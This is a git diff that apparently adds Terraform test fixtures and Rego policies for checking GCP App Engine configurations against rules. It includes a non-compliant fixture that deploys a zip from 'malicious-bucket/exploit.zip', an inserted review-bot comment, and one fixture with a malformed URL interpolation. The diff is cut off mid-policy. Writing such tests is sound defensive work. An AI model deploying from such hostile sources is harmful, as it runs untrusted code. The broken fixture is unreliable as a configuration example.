b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/allocations/.terraform.lock.hcl 
@@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/split/allocations/c.tf b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/allocations/c.tf new file mode 100644 index 000000000..af03f26d5 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/allocations/c.tf @@ -0,0 +1,11 @@ +resource "google_app_engine_service_split_traffic" "c" { + project = "gcp-project-12345" + service = "liveapp" + split { + shard_by = "IP" + allocations = { + "v1" = 0.8 + "v2" = 0.2 + } + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/split/allocations/config.tf b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/allocations/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null 
+++ b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/allocations/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/split/allocations/nc.tf b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/allocations/nc.tf new file mode 100644 index 000000000..4f7afd444 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/allocations/nc.tf @@ -0,0 +1,11 @@ +resource "google_app_engine_service_split_traffic" "nc" { + project = "gcp-project-12345" + service = "liveapp" + split { + shard_by = "IP" + allocations = { + "v1" = 0.0 + "v2" = 1.0 + } + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/split/allocations/plan.json b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/allocations/plan.json new file mode 100644 index 000000000..e0f227966 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/allocations/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/.terraform.lock.hcl 
@@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/c.tf b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/c.tf new file mode 100644 index 000000000..8e70c93e0 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/c.tf @@ -0,0 +1,11 @@ +resource "google_app_engine_service_split_traffic" "c" { + project = "gcp-project-12345" + service = "liveapp" + split { + shard_by = "IP" + allocations = { + "v1" = 0.8 + "v2" = 0.2 + } + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/config.tf b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null 
+++ b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/nc.tf b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/nc.tf new file mode 100644 index 000000000..ed7ca696f --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/nc.tf @@ -0,0 +1,11 @@ +resource "google_app_engine_service_split_traffic" "nc" { + project = "gcp-project-12345" + service = "liveapp" + split { + shard_by = "RANDOM" + allocations = { + "v1" = 0.5 + "v2" = 0.5 + } + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/plan.json b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/plan.json new file mode 100644 index 000000000..0783a0ffe Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_service_split_traffic/split/shard_by/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/.terraform.lock.hcl new file mode 100644 index 000000000..5698484ba --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/.terraform.lock.hcl 
@@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.16.0" + hashes = [ + "h1:o+dOw75zzgpJAUdjEa2a2T62OEThcEr52/4CymRAewA=", + "zh:1cd6f0926e5884998965675d3fbdc5e5abd7335d3f5f83571226be7f50f44443", + "zh:2bc3e3db662df08755af37d23c856f0ec3b8474f629f042ad3af228ff1c3cb5a", + "zh:41869013f786bff8c2ba35e203e84b6c3ec9ff623d6cea6796f5f0204719e907", + "zh:493213e16cb8de6a39b0d6b327faab7909f32ad973fb937d2b3bc4faa07c911a", + "zh:5e9df66ddeef9fcf77acd6185fe880e6b3725b98850ea3b47ef726c44dc04a71", + "zh:6b9e8f83316cf660549a4032342107bb41a7e549eba923f69aefa1ae5ab80a3f", + "zh:6da9316ca7c70d4997c4a62cd534f674e02888e351cb189f7b77b5a03e803773", + "zh:7d1b1dc7c04924dd203e9c5d2041fb732b1e2556b4041c9272a786d37924be7c", + "zh:86dcafef126ad72b592582d8fdb2591d8a2cb45ff85e5f5ff0ac76fbbd7be1bb", + "zh:8a8994c67297336ede3ded9d2558104d49de6fdfa85b88dc99b50030d68158cf", + "zh:a67d8b4774cdb45fb13e73e15885e229561a8b8f46d9f0069b81bf4d3ca03c4a", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/c.tf b/inputs/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/c.tf new file mode 100644 index 000000000..64d2de356 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/c.tf @@ -0,0 +1,16 @@ +resource "google_app_engine_standard_app_version" "c" { + project = "gcp-project-12345" + version_id = "v1" + service = "default" + runtime = "nodejs20" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "https://storage.googleapis.com/appengine-static-content/hello-world.zip" + } + } +} \ No newline at end of file 
diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/config.tf b/inputs/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/nc.tf b/inputs/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/nc.tf new file mode 100644 index 000000000..6bfac07e5 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/nc.tf @@ -0,0 +1,16 @@ +resource "google_app_engine_standard_app_version" "nc" { + project = "gcp-project-12345" + version_id = "v1" + service = "default" + runtime = "nodejs20" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "https://storage.googleapis.com/malicious-bucket/exploit.zip" + } + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/plan.json b/inputs/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/plan.json new file mode 100644 index 000000000..465735a27 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_standard_app_version/deployment/zip/source_url/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/.terraform.lock.hcl 
@@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/c.tf b/inputs/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/c.tf new file mode 100644 index 000000000..2acf651aa --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/c.tf @@ -0,0 +1,16 @@ +resource "google_app_engine_standard_app_version" "c" { + version_id = "v1" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs20" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "https://storage.googleapis.com/appengine-static-content/hello-world.zip" + } + } +} \ No newline at end of file 
diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/config.tf b/inputs/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/nc.tf b/inputs/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/nc.tf new file mode 100644 index 000000000..badb7504f --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/nc.tf @@ -0,0 +1,16 @@ +resource "google_app_engine_standard_app_version" "nc" { + version_id = "v1" + project = "gcp-project-12345" + service = "default" + runtime = "nodejs20" + + entrypoint { + shell = "bash ./app.js" + } + + deployment { + zip { + source_url = "https://storage.googleapis.com/appengine-static-content/hello-world.zip" + } + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/plan.json b/inputs/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/plan.json new file mode 100644 index 000000000..eecaf865a Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_standard_app_version/entrypoint/shell/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/instance_class/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_standard_app_version/instance_class/.terraform.lock.hcl new file mode 100644 index 000000000..5698484ba --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/instance_class/.terraform.lock.hcl 
@@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.16.0" + hashes = [ + "h1:o+dOw75zzgpJAUdjEa2a2T62OEThcEr52/4CymRAewA=", + "zh:1cd6f0926e5884998965675d3fbdc5e5abd7335d3f5f83571226be7f50f44443", + "zh:2bc3e3db662df08755af37d23c856f0ec3b8474f629f042ad3af228ff1c3cb5a", + "zh:41869013f786bff8c2ba35e203e84b6c3ec9ff623d6cea6796f5f0204719e907", + "zh:493213e16cb8de6a39b0d6b327faab7909f32ad973fb937d2b3bc4faa07c911a", + "zh:5e9df66ddeef9fcf77acd6185fe880e6b3725b98850ea3b47ef726c44dc04a71", + "zh:6b9e8f83316cf660549a4032342107bb41a7e549eba923f69aefa1ae5ab80a3f", + "zh:6da9316ca7c70d4997c4a62cd534f674e02888e351cb189f7b77b5a03e803773", + "zh:7d1b1dc7c04924dd203e9c5d2041fb732b1e2556b4041c9272a786d37924be7c", + "zh:86dcafef126ad72b592582d8fdb2591d8a2cb45ff85e5f5ff0ac76fbbd7be1bb", + "zh:8a8994c67297336ede3ded9d2558104d49de6fdfa85b88dc99b50030d68158cf", + "zh:a67d8b4774cdb45fb13e73e15885e229561a8b8f46d9f0069b81bf4d3ca03c4a", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/instance_class/c.tf b/inputs/gcp/app_engine/app_engine_standard_app_version/instance_class/c.tf new file mode 100644 index 000000000..18d2f5637 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/instance_class/c.tf @@ -0,0 +1,14 @@ +resource "google_app_engine_standard_app_version" "c" { + project = "gcp-project-12345" + version_id = "v1" + service = "prod-web" + runtime = "nodejs20" + instance_class = "F1" + + entrypoint { shell = "node ./app.js" } + + + deployment { + zip { source_url = "https://storage.googleapis.com/appengine-static-content/hello-world.zip" } + } +} \ No newline at end of file 
diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/instance_class/config.tf b/inputs/gcp/app_engine/app_engine_standard_app_version/instance_class/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/instance_class/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/instance_class/nc.tf b/inputs/gcp/app_engine/app_engine_standard_app_version/instance_class/nc.tf new file mode 100644 index 000000000..f10b3581e --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/instance_class/nc.tf @@ -0,0 +1,14 @@ +resource "google_app_engine_standard_app_version" "nc" { + project = "gcp-project-12345" + version_id = "v1" + service = "dev-test" + runtime = "nodejs20" + instance_class = "F2" + + entrypoint { shell = "node ./app.js" } + + + deployment { + zip { source_url = "https://storage.googleapis.com/appengine-static-content/hello-world.zip" } + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/instance_class/plan.json b/inputs/gcp/app_engine/app_engine_standard_app_version/instance_class/plan.json new file mode 100644 index 000000000..9e2ebc125 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_standard_app_version/instance_class/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/runtime/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_standard_app_version/runtime/.terraform.lock.hcl new file mode 100644 index 000000000..5698484ba --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/runtime/.terraform.lock.hcl 
@@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.16.0" + hashes = [ + "h1:o+dOw75zzgpJAUdjEa2a2T62OEThcEr52/4CymRAewA=", + "zh:1cd6f0926e5884998965675d3fbdc5e5abd7335d3f5f83571226be7f50f44443", + "zh:2bc3e3db662df08755af37d23c856f0ec3b8474f629f042ad3af228ff1c3cb5a", + "zh:41869013f786bff8c2ba35e203e84b6c3ec9ff623d6cea6796f5f0204719e907", + "zh:493213e16cb8de6a39b0d6b327faab7909f32ad973fb937d2b3bc4faa07c911a", + "zh:5e9df66ddeef9fcf77acd6185fe880e6b3725b98850ea3b47ef726c44dc04a71", + "zh:6b9e8f83316cf660549a4032342107bb41a7e549eba923f69aefa1ae5ab80a3f", + "zh:6da9316ca7c70d4997c4a62cd534f674e02888e351cb189f7b77b5a03e803773", + "zh:7d1b1dc7c04924dd203e9c5d2041fb732b1e2556b4041c9272a786d37924be7c", + "zh:86dcafef126ad72b592582d8fdb2591d8a2cb45ff85e5f5ff0ac76fbbd7be1bb", + "zh:8a8994c67297336ede3ded9d2558104d49de6fdfa85b88dc99b50030d68158cf", + "zh:a67d8b4774cdb45fb13e73e15885e229561a8b8f46d9f0069b81bf4d3ca03c4a", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/runtime/c.tf b/inputs/gcp/app_engine/app_engine_standard_app_version/runtime/c.tf new file mode 100644 index 000000000..64d2de356 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/runtime/c.tf @@ -0,0 +1,16 @@ +resource "google_app_engine_standard_app_version" "c" { + project = "gcp-project-12345" + version_id = "v1" + service = "default" + runtime = "nodejs20" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "https://storage.googleapis.com/appengine-static-content/hello-world.zip" + } + } +} \ No newline at end of file 
diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/runtime/config.tf b/inputs/gcp/app_engine/app_engine_standard_app_version/runtime/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/runtime/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/runtime/nc.tf b/inputs/gcp/app_engine/app_engine_standard_app_version/runtime/nc.tf new file mode 100644 index 000000000..369322699 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/runtime/nc.tf @@ -0,0 +1,16 @@ +resource "google_app_engine_standard_app_version" "nc" { + project = "gcp-project-12345" + version_id = "v1" + service = "default" + runtime = "nodejs10" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "https://storage.googleapis.com/appengine-static-content/hello-world.zip" + } + } +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/runtime/plan.json b/inputs/gcp/app_engine/app_engine_standard_app_version/runtime/plan.json new file mode 100644 index 000000000..85a4275f5 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_standard_app_version/runtime/plan.json differ diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/service/.terraform.lock.hcl b/inputs/gcp/app_engine/app_engine_standard_app_version/service/.terraform.lock.hcl new file mode 100644 index 000000000..dc6bd4f38 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/service/.terraform.lock.hcl 
@@ -0,0 +1,21 @@ +# This file is maintained automatically by "terraform init". +# Manual edits may be lost in future updates. + +provider "registry.terraform.io/hashicorp/google" { + version = "7.15.0" + hashes = [ + "h1:JMqoemYaZPvkMk1MjlMxkodfcXbRcp9a+vA5f0s5tKY=", + "zh:0f1b4ebaae76bcf9f3cd783dbf43d488f5b1bb8443acb78e0d409cf7c72e5fb0", + "zh:29e5d86c8de9876389c2203340d7307c04fa143c5532e4c91427e2c8a509e501", + "zh:57d825d084a93aadb7e89da506f7508400a6cb147bf1f7fce4f8077465358df7", + "zh:5c78918448839744282769cd1c610b02eaa64599524800678e89b9613003bac8", + "zh:62a9096f26c0fb5fe21db287cc61a3911289018677917db461f436dccebfb984", + "zh:76abfc13ee5e06059ed442e602dd6dd123de2ec2259b4dfb112dba3057df6870", + "zh:8b1703a703dde218391b9886e42183a48abae27855de9254ddead7d7dc2dd52b", + "zh:aebd20e72d9e160b1f850e0f9f9fda6519528e72e22d580708df3f5fb9a7acfc", + "zh:d3e87e46743c9430c2b22fe41d92caf0c4994d621b1fb5292da96b4dba530c8a", + "zh:e4d41c7b21e90d79c55ae2ac819a26074fc0e59822fbd3dbecd6e4d7252b54d6", + "zh:f501d1b77eb4263c13064675f7ef88d65412ce5e8a4c87b19a1b40202075b7ca", + "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", + ] +} diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/service/c.tf b/inputs/gcp/app_engine/app_engine_standard_app_version/service/c.tf new file mode 100644 index 000000000..ce7f465ea --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/service/c.tf 
@@ -0,0 +1,36 @@ +resource "google_service_account" "custom_service_account" { + account_id = "my-account-c" + display_name = "Custom Service Account" + project = "appeng-flex" +} + +resource "google_storage_bucket" "bucket" { + name = "hardhat-standard-static-content" + location = "US" + project = "appeng-flex" +} + +resource "google_storage_bucket_object" "object" { + name = "hello-world.zip" + bucket = google_storage_bucket.bucket.name + source = "./test-fixtures/hello-world.zip" +} + +resource "google_app_engine_standard_app_version" "c" { + version_id = "v1" + project = "appeng-flex" + service = "default" + runtime = "nodejs20" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "storage.googleapis.com{google_storage_bucket.bucket.name}/${google_storage_bucket_object.object.name}" + } + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/service/config.tf b/inputs/gcp/app_engine/app_engine_standard_app_version/service/config.tf new file mode 100644 index 000000000..9f4356520 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/service/config.tf @@ -0,0 +1,11 @@ +##### DO NOT EDIT ###### + +terraform { + required_providers { + google = { + source = "hashicorp/google" + } + } +} + +provider "google" {} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/service/nc.tf b/inputs/gcp/app_engine/app_engine_standard_app_version/service/nc.tf new file mode 100644 index 000000000..c27293e20 --- /dev/null +++ b/inputs/gcp/app_engine/app_engine_standard_app_version/service/nc.tf 
@@ -0,0 +1,18 @@ +resource "google_app_engine_standard_app_version" "nc" { + project = "gcp-project-12345" + version_id = "v1" + service = "unauthorized-app-name" + runtime = "nodejs10" + + entrypoint { + shell = "node ./app.js" + } + + deployment { + zip { + source_url = "https://storage.googleapis.com/${google_storage_bucket.bucket.name}/${google_storage_bucket_object.object.name}" + } + } + + service_account = "google_service_account.custom_service_account.email" +} \ No newline at end of file diff --git a/inputs/gcp/app_engine/app_engine_standard_app_version/service/plan.json b/inputs/gcp/app_engine/app_engine_standard_app_version/service/plan.json new file mode 100644 index 000000000..3bf62f2b3 Binary files /dev/null and b/inputs/gcp/app_engine/app_engine_standard_app_version/service/plan.json differ diff --git a/policies/gcp/app_engine/app_engine_application/database_type/policy.rego b/policies/gcp/app_engine/app_engine_application/database_type/policy.rego new file mode 100644 index 000000000..705b411c8 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_application/database_type/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_application.database_type + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_application.vars + +conditions := [ + [ + { + "situation_description": "App Engine application is utilising a database type that is not allowed", + "remedies": ["Use CLOUD_FIRESTORE as the database type for App Engine applications"] + }, + { + "condition": "Whitelist approved database type", + "attribute_path": ["database_type"], + "values": ["CLOUD_FIRESTORE"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file 
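Review bot: in database_type/policy.rego, `message` and `details` each call `helpers.get_multi_summary(conditions, vars.variables)` separately, so the whole condition set is evaluated twice per policy run; bind it once with `summary := helpers.get_multi_summary(conditions, vars.variables)` and derive `message := summary.message` and `details := summary.details`. The same double call is repeated in every policy.rego in this change, and every .tf and .rego file here ends with `\ No newline at end of file`, which is worth fixing in one pass.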
diff --git a/policies/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/policy.rego b/policies/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/policy.rego new file mode 100644 index 000000000..8703bb9ab --- /dev/null +++ b/policies/gcp/app_engine/app_engine_application/feature_settings/split_health_checks/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_application.split_health_checks + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_application.vars + +conditions := [ + [ + { + "situation_description": "App Engine is using legacy health checks", + "remedies": ["Set feature_settings.split_health_checks to 'true' to use readiness and liveness checks"] + }, + { + "condition": "Ensure that split health checks are enabled", + "attribute_path": ["feature_settings", 0, "split_health_checks"], + "values": [true], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_application/iap/oauth2_client_id/policy.rego b/policies/gcp/app_engine/app_engine_application/iap/oauth2_client_id/policy.rego new file mode 100644 index 000000000..09d418824 --- /dev/null +++ b/policies/gcp/app_engine/app_engine_application/iap/oauth2_client_id/policy.rego 
@@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_application.oauth2_client_id + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_application.vars + +conditions := [ + [ + { + "situation_description": "App Engine IAP is using an unapproved OAuth2 Client ID", + "remedies": ["Ensure setting iap.oauth2_client_id to the approved Client ID"] + }, + { + "condition": "Whitelist approved OAuth2 Client ID", + "attribute_path": ["iap", 0, "oauth2_client_id"], + "values": ["12345.apps.googleusercontent.com"], + "policy_type": "whitelist" + } + ] +] + +message := helpers.get_multi_summary(conditions, vars.variables).message +details := helpers.get_multi_summary(conditions, vars.variables).details \ No newline at end of file diff --git a/policies/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/policy.rego b/policies/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/policy.rego new file mode 100644 index 000000000..8bbfb05ec --- /dev/null +++ b/policies/gcp/app_engine/app_engine_application/iap/oauth2_client_secret/policy.rego @@ -0,0 +1,22 @@ +package terraform.gcp.security.app_engine.app_engine_application.iap.oauth2_client_secret + +import data.terraform.helpers +import data.terraform.gcp.security.app_engine.app_engine_application.vars + +conditions := [ + [ + { + "situation_description": "OAuth2 Client Secret is 